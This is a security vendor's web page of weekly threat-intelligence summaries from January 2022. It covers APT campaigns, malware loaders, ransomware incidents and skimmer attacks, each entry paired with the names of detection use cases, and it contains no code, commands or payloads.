The Anvilogic Threat Reports

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge.

We are committed to (read more…)

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge. We are committed to helping the community detect attacks by helping your team look for malicious exploit strings, as well as, run exposure checks on your endpoint devices/servers, which can help identify a successful payload delivery and compromise using this vulnerability.

Intelligence Levels
  • Tactical: Detectable threat behaviors for response with threat scenarios or threat identifiers
  • Strategic: General information security news, for awareness
About the Team

The Anvilogic Forge is a team of security professionals dedicated to tracking threats and crafting reliable detection strategies for our trusted clients while contributing to our peers in the security industry.

Our mission is to assess the operational behaviors of all threats to provide the community, and our customers, with actionable information and enterprise-ready detections in order to defend themselves in an ever-changing threat landscape.

Our Craft

Curate threat intelligence to provide situational awareness and actionable intelligence to our clients. The results of our crafts are:

  • Detections
    • Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
    • Threat Scenarios: risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
  • Reports Hot off the forge:
    • Threat News Reports
    • Trending Threat Reports
    • Research Articles
Want more?

If this information is useful, please feel free to get in touch with us to see how Anvilogic can help you grow your security operations at yo@anvilogic.com.

Sign-up for Anvilogic’s weekly threat reports and receive a threat round-up, active notifications of relevant threats to harden your security posture, and ready-to-deploy threat detection logic & content associated with applicable trending threats.

If you are not a customer but would like to get the detection code for a specific vulnerability or exploit, reach out to us we’re happy to help: detection.support@anvilogic.com

Learn More about The Anvilogic Threat Detection and Incident Response (TDIR) Platform

(read less…)

BlueNoroff Cryptocurrency Focused APT Group

January 18, 2022

BlueNoroff Cryptocurrency Focused APT Group

Industry: Finance & Technology | Level: Operational | Source: Securelist

Kaspersky shared research for BlueNoroff, an APT group tracked by Kaspersky that seemingly has associations with Lazarus. Kaspersky began tracking the group after their 2016 attack on Bangladesh’s Central Bank. The group’s attack proficiency is most specialized in “the abuse of trust. Be it an internal bank server communicating with SWIFT infrastructure to issue fraudulent transactions, cryptocurrency exchange software installing an update with a backdoor to compromise its own user, or other means.” The group’s activities this year appear to have been focused on cryptocurrency startups. The group communicates through services such as Google Drive or LinkedIn messages as an initial lure, delivering malicious documents either directly or a compressed file that would also contain an LNK file. The malicious document’s execution would launch PowerShell and/or a VBScript that conducts basic fingerprinting on the system before the threat actor proceeds with additional objectives such as collecting credentials or setting/stealing cryptocurrency, the group operates patiently to study the environment and blend their activities.

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Rundll32 Command Line
    • Suspicious File written to Disk
    • Windows Copy Files

APT35 CharmPower & Log4j

January 18, 2022

APT35 CharmPower & Log4j

Industry: N/A | Level: Tactical | Source: CheckPoint

Intelligence from CheckPoint shares threat activity from Iranian nation-state actor group – APT35 (aka Charming Kitten, TA453, or Phosphorus) exploiting the Log4j/CVE-2021-44228 vulnerability to distribute their PowerShell toolkit – CharmPower. As the tool’s name suggests, the exploitation chain following the successful Log4j exploit is heavily PowerShell based, and the malicious java class triggers an encoded PowerShell command to download a module from an Amazon S3 bucket executing a loader. CharmPower contains a variety of modules such as downloading additional payloads, system enumeration, data collection, and exfiltration.

  • Anvilogic Use Cases:
    • Suspicious process Spawned by Java
    • Encoded Powershell Command
    • Suspicious Executable by Powershell
    • Executable Process from Suspicious Folder

Web Page Archive Files

January 18, 2022

Web Page Archive Files

Industry: N/A | Level: Operational | Source: NetSkope

NetSkope Threat Labs has observed the distribution of malicious Microsoft Office documents using Web Page Archive files (“.mht” or “.mhtml”) in recent campaigns that also utilize collaborative programming environment – Glitch for its C2. From past campaigns in the usage of mht and mhtml files, there is a potential link to APT32/OceanLotus. The malicious document contains malicious VBS code with the payload in the web archive and drops a DLL file onto the disk. From there a scheduled task is created, executing every 10 mins masquerading as “Winrar Update.” The DLL injects itself into another process and spawns rundll32 to run indefinitely. Lastly, data collected from network reconnaissance is sent to a C2 server hosted on Glithch.

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Malicious Document Execution
    • Rundll32 Command Line
    • Create/Modify Schtasks

Signed DLL Campaigns / Polyglot

January 18, 2022

Signed DLL Campaigns / Polyglot

Industry: N/A | Level: Operational | Source: Medium

Security researchers – Jason Reaves and Joshua Platt, shared campaign details associated with tactics from ‘Polyglotting’ to help bypass security checks. As found by the researchers “Recently an actor has begun using a technique of embedding VBScript data at the end of Microsoft signed DLLs in order to GPG decrypt and then detonate payloads.” Recent campaigns have distributed malicious files through illegitimate software installers, malware that has been distributed includes AterAgent RAT, Zloader, Gozi, and Cobalt Strike. There is a variation of activity, with most associated with the VBScript altering window defender, invoking a PowerShell download, registry modification, and some with shutdown commands.

  • Anvilogic Scenario: Polyglot – Signed DLLs
  • Anvilogic Use Cases:
    • Cscript or Wscript execution
    • Invoke-WebRequest Command
    • Modify Windows Defender

ProxyShell Exploited with DatopLoader Leading to Qakbot

January 18, 2022

ProxyShell Exploited with DatopLoader Leading to Qakbot

Industry: N/A | Level: Operational | Source: Cybereason

A threat report from Cybereason and security researcher, Orange Tsai, investigates a new malware loader – DatopLoader that emerged in September 2021. The malware loader was observed to be a payload dropping following the attacker’s successful exploitation of ProxyShell and Exchange vulnerabilities. Once the loader is executed, Qakbot/Qbot lands on the victim’s workstation to set up persistence and conduct reconnaissance activity, using largely native tools with the exception of AdFind. Cobalt Strike is also launched, using PsExec to move laterally in the environment. In addition, credential access has been identified through gathering from registry hives.

  • Anvilogic Scenario: DatopLoader & Qakbot
  • Anvilogic Use Cases:
    • Potential ProxyShell
    • Common Exchange Recon cmdlets
    • Exchange Remove Export Request
    • regsvr32 Execution
    • Credentials in Registry

SysJoker

January 18, 2022

Report from Intezer shares research of a new backdoor – SysJoker, that was discovered in December

AvosLocker Targets VMware ESXi

January 05, 2022

AvosLocker Targets VMware ESXi

Industry: N/A | Level: Strategic | Source: BleepingComputer

AvosLoacker adds Linux support to its ransomware arsenal as researchers identified the latest variant targeting VMware ESXi virtual machines. One victim has been identified by Threat Researcher Chistiaan Beek – @ChristiaanBeek. The unknown entity was hit with a $1 million ransom demand. Limited technical details are released, however, what is known is the ransomware terminates VMs prior to encryption, appends extension “.avoslinux” to encrypted files, and provide a ransom note to victims. A stipulation is placed that workstations cannot be shut down to “avoid file corruption.”

FinalSite Ransomware

January 05, 2022

FinalSite Ransomware

Industry: Education & Technology | Level: Strategic | Source: FinalSite

FinalSite – a school website design SaaS provider, suffered a ransomware attack on January 4th, 2022. The attack impacted various school districts as FinalSite claims to serve a large customer base, stating their solution is utilized by over 8,000 schools and universities in 115 different countries. The inaccessibly of their websites to schools has caused issues for school districts utilizing the service, to send emergency email notification. This is especially pertinent, as schools send notifications for school closures and COVID-related news. The company is currently working with cyber forensic investigations firm – Charles River Associates for a more comprehensive investigation and is providing limited details on the impact of the attack. From the company statement “After six days of investigation, we know when the threat actor entered, how they entered, and what they looked at. We are confident in saying that no client data has been viewed, compromised, or extracted”. While the ransomware strain is identified the SaaS provider did not disclose details of the variant.

Video Player Spreads Skimmers

January 05, 2022

Video Player Spreads Skimmers

Industry: Real Estate | Level: Strategic | Source: PaloAltoUnit42 & TheRecord

Research from PaloAlto Unti42 identified over 100 real estate sites compromised to distribute skimmers collecting user information. The affected real estate sites all belonged to one parent company – Sotheby’s with their Brightcove account having been compromised. The compromised sites all imported the same malicious video from the cloud video platform, which in essence brought about a supply chain network attack. The issue associated with the Sotheby and Brightcove has been resolved prior to Unit42 sharing their analysis and findings.